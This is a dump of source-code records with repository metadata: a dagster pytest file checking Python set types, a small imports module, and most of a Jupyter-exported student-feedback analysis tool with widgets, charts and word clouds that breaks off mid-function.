ac78bdbec54754d35f51d706fc5b0bacfe49f2bf
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster_tests/core_tests/runtime_types_tests/test_python_set.py
|
pseudoPixels/dagster
|
ac78bdbec54754d35f51d706fc5b0bacfe49f2bf
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster_tests/core_tests/runtime_types_tests/test_python_set.py
|
pseudoPixels/dagster
|
ac78bdbec54754d35f51d706fc5b0bacfe49f2bf
|
[
"Apache-2.0"
] | null | null | null |
import typing
import pytest
from dagster import (
DagsterTypeCheckError,
InputDefinition,
Optional,
OutputDefinition,
execute_solid,
lambda_solid,
)
from dagster.core.types.runtime.python_set import create_typed_runtime_set
from dagster.core.types.runtime.runtime_type import resolve_to_runtime_type
def test_vanilla_set_output():
@lambda_solid(output_def=OutputDefinition(set))
def emit_set():
return {1, 2}
assert execute_solid(emit_set).output_value() == {1, 2}
def test_vanilla_set_output_fail():
@lambda_solid(output_def=OutputDefinition(set))
def emit_set():
return 'foo'
with pytest.raises(DagsterTypeCheckError):
execute_solid(emit_set)
def test_vanilla_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=set)])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_vanilla_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=set)])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
def test_open_typing_set_output():
@lambda_solid(output_def=OutputDefinition(typing.Set))
def emit_set():
return {1, 2}
assert execute_solid(emit_set).output_value() == {1, 2}
def test_open_typing_set_output_fail():
@lambda_solid(output_def=OutputDefinition(typing.Set))
def emit_set():
return 'foo'
with pytest.raises(DagsterTypeCheckError):
execute_solid(emit_set)
def test_open_typing_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set)])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_open_typing_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set)])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
def test_runtime_set_of_int():
set_runtime_type = create_typed_runtime_set(int).inst()
set_runtime_type.type_check({1})
set_runtime_type.type_check(set())
res = set_runtime_type.type_check(None)
assert not res.success
res = set_runtime_type.type_check('nope')
assert not res.success
res = set_runtime_type.type_check({'nope'})
assert not res.success
def test_runtime_optional_set():
set_runtime_type = resolve_to_runtime_type(Optional[create_typed_runtime_set(int)])
set_runtime_type.type_check({1})
set_runtime_type.type_check(set())
set_runtime_type.type_check(None)
res = set_runtime_type.type_check('nope')
assert not res.success
res = set_runtime_type.type_check({'nope'})
assert not res.success
def test_closed_typing_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set[int])])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_closed_typing_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set[int])])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': {'fkjdf'}})
| 27.105263
| 88
| 0.715673
| 492
| 3,605
| 4.896341
| 0.111789
| 0.068493
| 0.069738
| 0.07472
| 0.879618
| 0.822748
| 0.782482
| 0.77501
| 0.764218
| 0.764218
| 0
| 0.007307
| 0.164771
| 3,605
| 132
| 89
| 27.310606
| 0.79276
| 0
| 0
| 0.670455
| 0
| 0
| 0.018863
| 0
| 0
| 0
| 0
| 0
| 0.113636
| 1
| 0.25
| false
| 0
| 0.056818
| 0.113636
| 0.420455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
d2300a99826e536597dfbcce4722a90f6d350735
| 89
|
py
|
Python
|
DATnet-master/utils/__init__.py
|
limit-scu/2019-TPAMI-DATNet
|
30ade0642928217541b76b0152382894b7ab73ea
|
[
"MIT"
] | 1
|
2019-11-08T02:45:08.000Z
|
2019-11-08T02:45:08.000Z
|
DATnet-master/utils/__init__.py
|
limit-scu/2019-TPAMI-DATNet
|
30ade0642928217541b76b0152382894b7ab73ea
|
[
"MIT"
] | null | null | null |
DATnet-master/utils/__init__.py
|
limit-scu/2019-TPAMI-DATNet
|
30ade0642928217541b76b0152382894b7ab73ea
|
[
"MIT"
] | null | null | null |
from utils.data_utils import *
from utils.data_utils import *
from utils.logger import *
| 22.25
| 30
| 0.797753
| 14
| 89
| 4.928571
| 0.357143
| 0.391304
| 0.376812
| 0.521739
| 0.826087
| 0.826087
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 89
| 3
| 31
| 29.666667
| 0.896104
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
d27bbd10baaf9903aea66a53d0b9dfafd5f86b3f
| 88,025
|
py
|
Python
|
SSP3_version1.py
|
ShivamGaurUQ/Student_Staff_Partnership_Project
|
18fc694bffc3ffb531cea53199e47581834f8bef
|
[
"MIT"
] | 1
|
2019-09-11T15:05:28.000Z
|
2019-09-11T15:05:28.000Z
|
SSP3_version1.py
|
ShivamGaurUQ/Student_Staff_Partnership_Project
|
18fc694bffc3ffb531cea53199e47581834f8bef
|
[
"MIT"
] | null | null | null |
SSP3_version1.py
|
ShivamGaurUQ/Student_Staff_Partnership_Project
|
18fc694bffc3ffb531cea53199e47581834f8bef
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# <h1><center>Student Feedback Data Analysis</center></h1>
# <img src="analytics.jpg" width="500" height="100" align="center"/>
# In[47]:
#import libraries
import nltk
from nltk.corpus import wordnet as wn
from nltk import pos_tag, word_tokenize
import xlrd
nltk.download('averaged_perceptron_tagger')
import ipywidgets as widgets
from ipywidgets import HBox, VBox
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import display
get_ipython().run_line_magic('matplotlib', 'inline')
from pandas import DataFrame, read_csv
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
from nltk.corpus import stopwords
import nltk as nl
nl.download('punkt',quiet=True)
nl.download('stopwords',quiet=True)
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
import collections
from nltk.text import Text
import re
from nltk.collocations import BigramAssocMeasures, BigramCollocationFinder
from operator import itemgetter
from nltk.stem.wordnet import WordNetLemmatizer
import string
import gensim
from gensim import corpora
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from ipywidgets import Button, HBox, VBox, Layout, Box
from IPython.display import display
from IPython.display import clear_output
import pyLDAvis
import pyLDAvis.gensim
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.feature_extraction.text import CountVectorizer
import pyLDAvis.sklearn
from pivottablejs import pivot_ui
import os
import sys
import tkinter as tk
from pandas.api.types import is_string_dtype
import sys
sys.tracebacklimit=0
# Modify the path
sys.path.append("..")
import yellowbrick as yb
from tkinter import filedialog
# In[108]:
##########################################################################
# Imports
##########################################################################
from yellowbrick.text.base import TextVisualizer
##########################################################################
# PosTagVisualizer
##########################################################################
class PosTagVisualizer(TextVisualizer):
"""
A part-of-speech tag visualizer colorizes text to enable
the user to visualize the proportions of nouns, verbs, etc.
and to use this information to make decisions about text
normalization (e.g. stemming vs lemmatization) and
vectorization.
Parameters
----------
kwargs : dict
Pass any additional keyword arguments to the super class.
cmap : dict
ANSII colormap
These parameters can be influenced later on in the visualization
process, but can and should be set as early as possible.
"""
def __init__(self, ax=None, **kwargs):
super(PosTagVisualizer, self).__init__(ax=ax, **kwargs)
# TODO: hard-coding in the ANSII colormap for now.
# Can we let the user reset the colors here?
self.COLORS = {
'white' : "\033[0;37m{}\033[0m",
'yellow' : "\033[0;33m{}\033[0m",
'green' : "\033[0;32m{}\033[0m",
'blue' : "\033[0;34m{}\033[0m",
'cyan' : "\033[0;36m{}\033[0m",
'red' : "\033[0;31m{}\033[0m",
'magenta' : "\033[0;35m{}\033[0m",
'black' : "\033[0;30m{}\033[0m",
'darkwhite' : "\033[1;37m{}\033[0m",
'darkyellow' : "\033[1;33m{}\033[0m",
'darkgreen' : "\033[1;32m{}\033[0m",
'darkblue' : "\033[1;34m{}\033[0m",
'darkcyan' : "\033[1;36m{}\033[0m",
'darkred' : "\033[1;31m{}\033[0m",
'darkmagenta': "\033[1;35m{}\033[0m",
'darkblack' : "\033[1;30m{}\033[0m",
None : "\033[0;0m{}\033[0m"
}
self.TAGS = {
'NN' : 'green',
'NNS' : 'green',
'NNP' : 'green',
'NNPS' : 'green',
'VB' : 'blue',
'VBD' : 'blue',
'VBG' : 'blue',
'VBN' : 'blue',
'VBP' : 'blue',
'VBZ' : 'blue',
'JJ' : 'red',
'JJR' : 'red',
'JJS' : 'red',
'RB' : 'cyan',
'RBR' : 'cyan',
'RBS' : 'cyan',
'IN' : 'darkwhite',
'POS' : 'darkyellow',
'PRP$' : 'magenta',
'PRP$' : 'magenta',
'DT' : 'black',
'CC' : 'black',
'CD' : 'black',
'WDT' : 'black',
'WP' : 'black',
'WP$' : 'black',
'WRB' : 'black',
'EX' : 'yellow',
'FW' : 'yellow',
'LS' : 'yellow',
'MD' : 'yellow',
'PDT' : 'yellow',
'RP' : 'yellow',
'SYM' : 'yellow',
'TO' : 'yellow',
'None' : 'off'
}
def colorize(self, token, color):
return self.COLORS[color].format(token)
def transform(self, tagged_tuples):
self.tagged = [
(self.TAGS.get(tag),tok) for tok, tag in tagged_tuples
]
# In[116]:
class SSP:
def __init__(self):
self.words = ['Data Settings','Explore','Visualize', 'WordClouds','Topic Modelling','Sentiment Analysis','Text Summarization']
self.items = [Button(description=w,button_style='info', # 'success', 'info', 'warning', 'danger' or ''
layout=Layout(width='175px')) for w in self.words]
display(HBox([item for item in self.items]))
np.warnings.filterwarnings('ignore')
self.import_data=widgets.Button(
description='Import New Data',
disabled=False,
button_style='warning', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Click to import new data',
icon='check'
)
display(self.import_data)
self.file_path=""
self.sheet=""
self.att=""
self.org_df=""
self.import_data.on_click(self.new_data)
self.items[0].on_click(self.preview_data)
self.items[1].on_click(self.explore_data)
self.items[2].on_click(self.vis_data)
self.items[3].on_click(self.wc_data)
self.items[4].on_click(self.tm_data)
self.items[5].on_click(self.sa_data)
self.items[6].on_click(self.ts_data)
def new_data(self,b):
from tkinter import filedialog
root = tk.Tk()
root.withdraw()
self.file_path = filedialog.askopenfilename()
self.labelf=widgets.Label(value="Selected Data : "+str(self.file_path),layout=Layout(width='50%'))
self.org_df=pd.read_excel(self.file_path)
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.labelf)
def preview_data(self,b):
if len(self.file_path)==0:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please import new data")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.wb = xlrd.open_workbook(self.file_path)
self.sheets=self.wb.sheet_names()
self.sheet_to_index={}
i=0
while i<len(self.sheets):
self.sheet_to_index[self.sheets[i]]=i
i=i+1
self.sheet_drop=widgets.Dropdown(options=self.sheets,value=self.sheets[0],layout=Layout(width='50%'),description='Sheet:',tooltip='Select a working sheet',disabled=False,)
self.sheet=self.wb.sheet_by_index(self.sheet_to_index[self.sheet_drop.value])
self.cols=[]
for i in range(self.sheet.ncols):
self.cols.append(self.sheet.cell_value(0, i))
self.att_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature for data cleaning and analysis',disabled=False,)
self.att=self.att_drop.value
self.item_display=[]
self.item_display.append(self.labelf)
self.item_display.append(self.sheet_drop)
self.item_display.append(self.att_drop)
display(HBox([item for item in self.item_display]))
#print("hi")
self.clean_choice=widgets.ToggleButtons(
options=['Original', 'Cleaned',],
value='Cleaned',
description='Use Data:',
layout=Layout(width='50%'),
disabled=False,
button_style='success', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Description',
)
display(self.clean_choice)
self.df = pd.read_excel(self.file_path)
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
def choice_disp(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(HBox([item for item in self.item_display]))
display(self.clean_choice)
if self.clean_choice.value=='Original':
#print("\nThere are {} observations and {} features in original dataset and {} observations and {} features in cleaned dataset. \n".format(df.shape[0],df.shape[1],df_cleaned.shape[0],df_cleaned.shape[1]))
print("\nA peek into originl data\n")
print("\nThere are {} observations and {} features in original dataset \n".format(self.df.shape[0],self.df.shape[1]))
self.org_df=self.df
display(self.df.head())
else:
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
self.att=self.att_drop.value
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
self.clean_choice.observe(choice_disp,'value')
self.rem_value.on_submit(choice_disp)
self.att_drop.observe(choice_disp, 'value')
def sheet_disp(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.sheet=self.wb.sheet_by_index(self.sheet_to_index[self.sheet_drop.value])
self.cols=[]
for i in range(self.sheet.ncols):
self.cols.append(self.sheet.cell_value(0, i))
self.att_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature for data cleaning and analysis',disabled=False,)
self.att=self.att_drop.value
self.item_display=[]
self.item_display.append(self.labelf)
self.item_display.append(self.sheet_drop)
self.item_display.append(self.att_drop)
display(HBox([item for item in self.item_display]))
self.clean_choice=widgets.ToggleButtons(
options=['Original', 'Cleaned',],
value='Cleaned',
description='Use Data:',
layout=Layout(width='50%'),
disabled=False,
button_style='success', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Description',
)
display(self.clean_choice)
self.df = pd.read_excel(self.file_path)
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
self.att=self.att_drop.value
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
self.clean_choice.observe(choice_disp,'value')
self.rem_value.on_submit(choice_disp)
self.att_drop.observe(choice_disp, 'value')
self.sheet_drop.observe(sheet_disp, 'value')
def explore_data(self,b):
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.action_list=['View Data','Sort Data','Group Data by Feature']
self.action_drop=widgets.Dropdown(options=self.action_list,value=self.action_list[0],layout=Layout(width='50%'),description='Action:',tooltip='Select an action to perform',disabled=False,)
display(self.action_drop)
display(self.org_df)
def action(change):
flag=0
def change_order(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.action_drop)
display(self.sort_order)
if self.sort_order.value=='Ascending':
flag=0
self.sort_df = self.org_df.sort_values(by = self.att)
display(self.sort_df)
else:
flag=1
self.sort_df = self.org_df.sort_values(by = self.att,ascending=False)
display(self.sort_df)
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.action_drop)
if self.action_drop.value=='View Data':
display(self.org_df)
if self.action_drop.value=='Sort Data':
self.sort_order=widgets.RadioButtons(
options=['Ascending', 'Descending'],
value='Ascending',
description='Sorting order:',
disabled=False
)
display(self.sort_order)
self.sort_df = self.org_df.sort_values(by = self.att)
display(self.sort_df)
self.sort_order.observe(change_order,'value')
if self.action_drop.value=='Group Data by Feature':
self.feat = self.org_df.groupby(self.att_drop.value)
display(self.feat.describe())
self.action_drop.observe(action, 'value')
#display(HBox([item for item in self.item_display]))
def vis_data(self, b):
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise feature distribution through Bar and Pie Chart",layout=Layout(width='50%')))
self.plotfeat_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to plot distribution',disabled=False,)
display(self.plotfeat_drop)
entire_feature = self.org_df.groupby(self.plotfeat_drop.value)
#plot graph of selected distribution
_labels =self.org_df[self.plotfeat_drop.value].unique()
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
ax.set_aspect(1)
entire_feature.size().sort_values(ascending=False).plot.pie(labels = _labels, autopct='%1.1f%%',legend = True, fontsize=20)
plt.ylabel('')
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.grid(True)
plt.figure(figsize=(20,20))
plt.subplot(222)
entire_feature.size().sort_values(ascending=False).plot.bar(legend = True,fontsize=20)
plt.xticks(rotation=50)
plt.xticks(np.arange(2), _labels)
plt.ylabel('')
plt.xlabel('')
#might need to come up with a better graph title
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.subplots_adjust(bottom=0.1, right=1.5, top=0.9)
plt.show()
def pie_plot(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise feature distribution through Bar and Pie Chart",layout=Layout(width='50%')))
display(self.plotfeat_drop)
entire_feature = self.org_df.groupby(self.plotfeat_drop.value)
#plot graph of selected distribution
_labels =self.org_df[self.plotfeat_drop.value].unique()
#print(_labels)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
ax.set_aspect(1)
entire_feature.size().sort_values(ascending=False).plot.pie(labels = _labels, autopct='%1.1f%%',legend = True, fontsize=20)
plt.ylabel('')
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.grid(True)
plt.figure(figsize=(20,20))
plt.subplot(222)
entire_feature.size().sort_values(ascending=False).plot.bar(legend = True,fontsize=20)
plt.xticks(rotation=50)
plt.xticks(np.arange(2), _labels)
plt.ylabel('')
plt.xlabel('')
#might need to come up with a better graph title
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.subplots_adjust(bottom=0.1, right=1.5, top=0.9)
plt.show()
self.plotfeat_drop.observe(pie_plot,'value')
def wc_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating worlcloud
#for w in token_words:
#if type(w)!="<class 'str'>":
#print(type(w))
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
def wc_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
#self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating worlcloud
#for w in token_words:
#if type(w)!='str':
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
self.wc_drop.observe(wc_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
def wc_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
#self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating worlcloud
#for w in token_words:
#if type(w)!='str':
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
finally:
self.wc_drop.observe(wc_change,'value')
def tm_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
